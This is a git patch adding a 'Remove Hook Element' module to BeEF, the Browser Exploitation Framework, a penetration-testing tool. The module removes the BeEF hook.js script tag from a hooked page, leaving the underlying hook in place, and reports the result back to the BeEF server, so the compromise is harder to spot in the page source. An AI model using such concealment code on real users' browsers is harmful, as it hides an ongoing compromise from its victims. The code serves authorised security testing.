From f628ce7ae9ea1ee3986d8aeb1d1e9e829faf8cc4 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Wed, 7 May 2014 18:57:26 +0800
Subject: [PATCH] Browser Module to remove the BeEF hook.js script element

---
 .../browser/remove_hook_element/command.js    | 29 +++++++++++++++++++
 .../browser/remove_hook_element/config.yaml   | 15 ++++++++++
 modules/browser/remove_hook_element/module.rb | 14 +++++++++
 3 files changed, 58 insertions(+)
 create mode 100644 modules/browser/remove_hook_element/command.js
 create mode 100644 modules/browser/remove_hook_element/config.yaml
 create mode 100644 modules/browser/remove_hook_element/module.rb

diff --git a/modules/browser/remove_hook_element/command.js b/modules/browser/remove_hook_element/command.js
new file mode 100644
index 000000000..4fb39fe42
--- /dev/null
+++ b/modules/browser/remove_hook_element/command.js
@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	/**
+	 * Removes the BeEF hook.js
+	 * @return: true if the hook.js script is removed from the DOM
+	 */
+	var removeHookElem = function() {
+		var removedFrames = $j('script[src*="'+beef.net.hook+'"]').remove();
+		if (removedFrames.length > 0) {
+			return true;
+		} else {
+			return false;
+		}
+	}
+
+	if (removeHookElem() == true) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=successfully removed the hook script element");
+	} else {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=something did not work");
+	}
+
+});
+
diff --git a/modules/browser/remove_hook_element/config.yaml b/modules/browser/remove_hook_element/config.yaml
new file mode 100644
index 000000000..15a2b06dd
--- /dev/null
+++ b/modules/browser/remove_hook_element/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        remove_hook_element:
+            enable: true
+            category: "Browser"
+            name: "Remove Hook Element"
+            description: "This module removes the BeEF hook script element from the hooked page, but the underlying BeEF DOM object remains."
+            authors: ["xntrik"]
+            target:
+                 working: ["All"]
diff --git a/modules/browser/remove_hook_element/module.rb b/modules/browser/remove_hook_element/module.rb
new file mode 100644
index 000000000..bd20f1f27
--- /dev/null
+++ b/modules/browser/remove_hook_element/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Remove_hook_element < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content["result"] = @datastore["result"] if not @datastore["result"].nil?
+		save content
+	end
+
+end